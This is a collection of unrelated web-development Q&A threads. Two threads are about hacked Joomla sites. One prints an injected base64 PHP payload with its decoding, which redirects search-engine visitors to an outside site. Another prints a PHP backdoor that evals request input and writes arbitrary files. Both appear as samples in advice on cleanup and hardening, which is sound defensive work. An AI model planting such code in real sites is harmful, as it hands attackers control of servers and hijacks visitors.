Lately my Joomla website was not showing properly, only the background image was loading, and some minor things.
Somehow the page template (index.php) was changed and some extra code was added. Specifically, this code:
eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpIGFuZCAhc3RyaXN0cigkdWFnLCJNU0lFIDYuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20vbCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImFvbC5jb20iKSkgew0KaWYgKCFzdHJpc3RyKCRyZWZlcmVyLCJjYWNoZSIpIG9yICFzdHJpc3RyKCRyZWZlcmVyLCJpbnVybCIpKXsNCmhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9wb2FzbS5xcG9lLmNvbS8iKTsNCmV4aXQoKTsNCn0KfQp9DQp9DQp9"));
was introduced several times throughout the php code, which is causing slow loading times (about 15-20 seconds to load any page) in my website.
It appears your site was hacked, this means it can be hacked again.
If you're using Joomla 1.5 you should make upgrade to at least the 2.5.x line, if you can't make sure you using version 1.5.26.
Next check all the extensions you have installed against the VEL (Joomla!'s Vulnerable Extensions List)
Once you've done that, you should secure you site using products like AdminTools or similar highly rated products from the Site Protection section of the Joomla Extensions Directory etc.
By the way that particular payload was built to capture users referred to your site by search engines and redirect them to http://poasm.qpoe.com/ It decodes to this:
error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
$referer=$_SERVER['HTTP_REFERER'];
$uag=$_SERVER['HTTP_USER_AGENT'];
if ($uag) {
if (!stristr($uag,"MSIE 7.0") and !stristr($uag,"MSIE 6.0")){
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"live.com") or stristr($referer,"webalta") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com/l") or stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location: http://poasm.qpoe.com/");
exit();
}
}
}
}
}
I stumbled upon this comment and was finally able to solve my problem.
Just go to administration --> Extensions --> Template Manager. Go to the Templates section, select your template, select Edit main page template, and get your index.php rid of all those garbage function calls. Cleaning it solved the problem for me, now everything is back to normal, everything loads as fast as before and all the pages display properly.
Related
I have modified the users component of Joomla, specifically the file components/com_users/controllers/profile.php and included some custom templates in components/com_users/views/profile/tmpl
It is mostly some forms which I am submitting and then redirecting to specific pages for further actions.
Example scenario :
Above option is accessible to user right after login. I have put it on the profile page by modifying default profile template.
So when someone enters a name, and presses search, then this form is submitted through form
action="<?php echo JRoute::_('index.php?option=com_users&task=profile.selectSendMessage'); ?>"
This in turn calls the function named selectSendMessage which is placed in profile.php file. The function looks like :
As you can see the function redirects to
index.php?option=com_users&view=profile&layout=sendMessage
I have placed sendMessage.php template in com_users/views/profile/tmpl
Everything works fine on localhost which I have set up on MAMP in MacOS
I moved the website to a live server a few days ago. I have followed all proper steps to migrate website and database from localhost to live server. Still any of the custom templates I have put in are never reached.
The strange thin is that Edit User Profile which is redirected to from the same profile.php file from a function edit(), with template in the same location as I have put in edit.php in views/profile/tmpl works as expected.
I am using 1and1 shared hosting plan 1&1 Unlimited for hosting the website.
I have been trying to fix this for quite some time now, but cannot understand the problem. I have tried reinstalling the website several times, tried installing from web apps from 1&1 control panel and modifying it, but no success.
Any tips and insights are welcome. Thank you.
It turns out that 1and1.com hosting somehow doesn't support layout names with a capital letter in it. I changed all layout names to lower case alphabets and everything worked fine like it should.
If someone faces the same issue, this is worth a try. It was particularly hard to debug since you will never suspect that could be a problem. I accidentally stumbled on the solution while playing around.
Thanks.
I'm working on a site developed by a third party, which is Magento 2.1 and uses bundle products heavily. Most of the bundles are made of 260 child products as a choice, and inevitably makes loading the product page for them incredibly slow.
On Mage 1 it was simple enough to use Full Page Caching to cache the bundle product options and speed up the load with pre-caching, but FPC in Mage 2 is clearly very different.
The main slowdown appears to be from the form and options blocks called in the catalog_product_view.xml for the theme, as they iterate over all the child products before rendering the page, so I've tried adding;
cacheable="true"
To those specific blocks, but it's made no difference.
Anyone have any other idea's for how to cache Magento 2 bundle product pages?
EDIT EDIT
I've just tried plugging the database into a fresh install of Magento 2.1 and can see that bundle products are being added to the var/page_cache directory. On the client server, the only thing being written to that directory are tags and header info.
So then new angle... why would Magento 2 not write any FPC html to the page_cache directory? Something higher up the tree has erroneously has cacheable=false set against it perhaps? I'll get digging
Sorry, I cannot comment your last post.
Do you try to use Varnish as the HTTP cache ? Magento recommendation is to use Varnish and Redis as cache backend.
So I found the issue, and it was a mistake made by the people who built the site, and the module creators of magepal magento2-googletagmanager. In both instances, the blocks had;
cacheable="false"
in the layout XML. Setting this on any block on a page will stop the whole page from cacheing. So remove that line, and add;
$this->_isScopePrivate = true;
In to the blocks __construct function. Problem solved.
I have an e-shop made with Joomla - Virtuemart.
The issue is that, at the first page, the website starts to open after 20-30seconds you hit the URL.
After discussing it with my hosting provider, they found that index.php sends for about 20s requests at the file :
httpdocs/cache/convertECB/86b44edeb1436781d050e4862dd10353-cache-convertECB-bf2c8f06ab151915cd5d7bbef20b70dd.php
Even if i manually delete it, joomla recreates the file and continue to be slow.
In global configuration cache is off.
Any idea, from what is this file coming from and how should i handle the situation?
UPDATE - CONTENT OF THE PHP FILE
<?php die("Access Denied");?>
#x#a:2:{s:6:"output";s:0:"";s:6:"result";a:32:{s:3:"EUR";s:1:"1";s:3:"USD";s:6:"1.1174";s:3:"JPY";s:6:"116.65";s:3:"BGN";s:6:"1.9558";s:3:"CZK";s:6:"27.067";s:3:"DKK";s:6:"7.4355";s:3:"GBP";s:7:"0.79033";s:3:"HUF";s:6:"315.15";s:3:"PLN";s:6:"4.4490";s:3:"RON";s:6:"4.5390";s:3:"SEK";s:6:"9.3915";s:3:"CHF";s:6:"1.0812";s:3:"NOK";s:6:"9.3798";s:3:"HRK";s:6:"7.5240";s:3:"RUB";s:7:"73.5915";s:3:"TRY";s:6:"3.2804";s:3:"AUD";s:6:"1.5212";s:3:"BRL";s:6:"3.8943";s:3:"CAD";s:6:"1.4530";s:3:"CNY";s:6:"7.3593";s:3:"HKD";s:6:"8.6715";s:3:"IDR";s:8:"14970.82";s:3:"ILS";s:6:"4.3228";s:3:"INR";s:7:"75.2010";s:3:"KRW";s:7:"1315.79";s:3:"MXN";s:7:"21.1845";s:3:"MYR";s:6:"4.5885";s:3:"NZD";s:6:"1.5899";s:3:"PHP";s:6:"51.899";s:3:"SGD";s:6:"1.5116";s:3:"THB";s:6:"39.455";s:3:"ZAR";s:7:"17.2240";}}
ECB is virtuemart currency conversion rates file. That file is downloaded 3 to 4 times daily depending on your settings. It is in cache ditetory and updated with new file names.
EDIT
You have to uninstall the module as by disabling it will still download xml conversion file. Login to administrator and then go to Control panel, Extensions - Install/Uninstall. Search and select "mod_virtuemart_currencies" now click on the uninstall button at the top.
It seems that you have more than one currency (maybe you have one product priced with another currency - once this is the case, the ECB will automatically be triggered). In any case, the fact that it's waiting 20-30 seconds means that it's timing out on something. Maybe it's trying to open a URL that has the IP of your website banned (this is very possible, and we had the exact scenario with one of our clients before).
If you can provide us with the contents of the cache file that is being called by your index.php file, maybe we can be of more help.
I have a problem on magento backend that I am not sure what is happening. Shopping cart price rule was working completely fine, but suddenly the rule page look like this:
screenshoot of shopping rule page
The content of each tab is loaded inside the tab div itself instead of on the content area on the right. Content area is completely empty.
No code was touched in relation with promotions code, or admin/core code at all. I don't see any issue on console or not js code loaded. This is the only page affected (shopping cart price rule page), catalog rule works fine as well as any other with same structure (product page, customer page and such).
I was recently playing around with promotion too much, creating, deleting and editing. And solved a 500 issue on cart page increasing php memory limit. Not sure if related with this issue.
On apache logs it only displays the following when I access that page:
client denied by server configuration: /www/app/etc/local.xml
Could someone help me in where to look in order to solve this issue or have a hint about what could be the issue?
I am completely lost with this one. Magento version 1.7.
Thanks.
I finally found the issue. It was a extension related.
Recently I had some issues on cart page and at some point I disabled a promotion extension (Amasty shipping rules) though magento backend, on system/advanced extensions list.
Seems like the extension is disabled but still used on promotion page, adding the structure for the feature but not showing what is supposed to show (because is disabled) and breaking the layout.
Enabling again the extension or removing the extension on files avoid the issue.
1) clear the cache maybe you made a update and your cache is wrong. you can clear in the admin side clear all the types, or erase all inside /www/var/cache
2) clear the page history in your browser, all is fine but your machime show that weird.
3) after that check the browser console, because is a css problem, maybe a file is lost or change the permitions.
I have a customer whose Joomla website was hacked, I am not exactly sure how it happened but I can see that there are many scripts that send out spam email, upon searching for files that contain the word eval( I found 61 matches like the following file:
<?php
$lbdw = "495c05e857e328e1e65ca6b0bc03dc88";
if (isset($_REQUEST['tlhqdsj'])) {
$mglvq = $_REQUEST['tlhqdsj'];
eval($mglvq);
exit();
}
if (isset($_REQUEST['ofva'])) {
$ulmajcbk = $_REQUEST['tbun'];
$cdpumv = $_REQUEST['ofva'];
$tgcjl = fopen($cdpumv, 'w');
$ogrmbcz = fwrite($tgcjl, $ulmajcbk);
fclose($tgcjl);
echo $ogrmbcz;
exit();
}
?>
I do not want to delete the whole website because I did not develop it, all I need is a security checklist and a way of searching for other known exploits.
What other precautions should I take on the server where this Joomla website is installed?
Any idea how they were able to upload so many files to the server?
This is a botnet PHP file, likely spread through an exploit in Joomla (there was one disclosed in mid-August, for example). It allows a remote user to execute arbitrary PHP code and upload files to your server. See the Joomla security page for more information.
My strongest recommendation would be to wipe the entire server -- or at least anything the customer's user had access to -- and start over. You never know what the attacker has uploaded, and you can never be completely sure there aren't more backdoors present.
If that's infeasible, I recommend wiping the Joomla install and reinstalling with a fresh copy of Joomla 2.5.14 or 3.1.5.
If you can't even do that, well, you can try upgrading Joomla in-place, searching for infected PHP files, and deleting them. You're running a strong risk that you'll miss a file and remain vulnerable, though.
Adding more to the above answer I would like you to read below.
Security Checklist/You have been hacked or defaced
Joomla hacked. How to prevent?
Joomla Security
Vulnerable Extensions List